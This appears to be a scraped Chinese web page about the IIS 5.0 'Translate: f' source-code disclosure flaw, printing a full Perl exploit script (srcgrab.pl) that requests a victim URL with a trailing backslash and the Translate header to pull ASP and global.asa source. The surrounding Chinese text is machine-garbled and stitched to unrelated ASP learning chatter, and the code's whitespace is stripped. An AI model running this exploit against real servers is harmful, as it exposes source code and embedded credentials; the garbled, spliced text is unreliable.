ASP网页设计iis5的asp保守
ASP最大的缺点在于网络的安全性和可靠性,企业将经营数据放在开放的平台上,最大的担忧就是如何保证这些数据不被其他人破坏。iis|iisiis5的asp保守当IIS5.0吸收到一个特别格局的头(Translate:f)的HTTP哀求,同时UR
L开端包括一个特别字符时,IIS会利用毛病的处置办法招致文件源代码泄露。
以下代码仅仅用来测试和研讨这个毛病,假如您将其用于不合法的路子请成果自
负
#!/usr/bin/perl
#Expl0itBysmiler@vxd.org
#TestedwithsucessagainstIIS5.0.MaybeitworksagainstIIS4.0u
singashareddrivebutIhaventtestedityet.
#Getthesourcecodeofanyscriptfromtheserverusingthisexploit
.
#ThiscodewaswrittenafterDanielDocekalbroughtthisissueinBug
Traq.
#Cheers351andFractalG:)
if(not$ARGV){
printqq~
Geeeitsrunning!!kewl:)))
Usage:srcgrab.plExampleUsage:srcgrab.plhttp://www.victimsite.co
m/global.asa
Ucanalsosavetheretrievedfileusing:srcgrab.plhttp://www.victi
m.com/default.asp>file_to_save
~;exit;}
$victimurl=$ARGV;
#Createauseragentobject
useLWP::UserAgent;
$ua=newLWP::UserAgent;
#Createarequest
my$req=newHTTP::RequestGET=>$victimurl.;#Hereistheba
ckslashattheendoftheurl;)
$req->content_type(application/x-www-form-urlencoded);
$req->content_type(text/html);
$req->header(Translate=>f);#Hereisthefamoustranslateheader
:))
$req->content(match=www&errors=0);
#Passrequesttotheuseragentandgetaresponseback
my$res=$ua->request($req);
#Checktheoutcomeoftheresponse
if($res->is_success){
print$res->content;
}else{
print$res->error_as_HTML;
}
</p>缺点:正版成本价格贵(盗版就不说了)、不够安全,大多数服务器用windows系统,没有linux安全 代码的可重用性差:由于是面向结构的编程方式,并且混合html,所以可能页面原型修改一点,整个程序都需要修改,更别提代码重用了。 最近在学asp,不要问我为什么不直接学.net,因为公司网站是asp做的所以有这个需要,卖了本书asp入门到精通,对里面的六大内置对象老是记不住,还有很多属性和方法看的头晕。 用户端的浏览器不需要提供任何别的支持,这样大提高了用户与服务器之间的交互的速度。 尽管MS自己讲C#内核中更多的象VC,但实际上我还是认为它和Java更象一些吧。首先它是面向对象的编程语言,而不是一种脚本,所以它具有面向对象编程语言的一切特性,比如封装性、继承性、多态性等等,这就解决了刚才谈到的ASP的那些弱点。 如何更好的使自己的东西看上去很不错等等。其实这些都不是问题的实质,我们可以在实践中不断提升自己,不断充实自己。 Request:从字面上讲就是“请求”,因此这个是处理客户端提交的东东的,例如Resuest.Form,Request.QueryString,或者干脆Request("变量名") 我可以结合自己的经验大致给你说一说,希望对你有所帮助,少走些弯路。 学习是为了用的,是为了让你的程序产生价值,把握住这个原则会比较轻松点。除此之外,课外时间一定要多参加一些社会实践活动,来锻炼自己的能力。
页:
[1]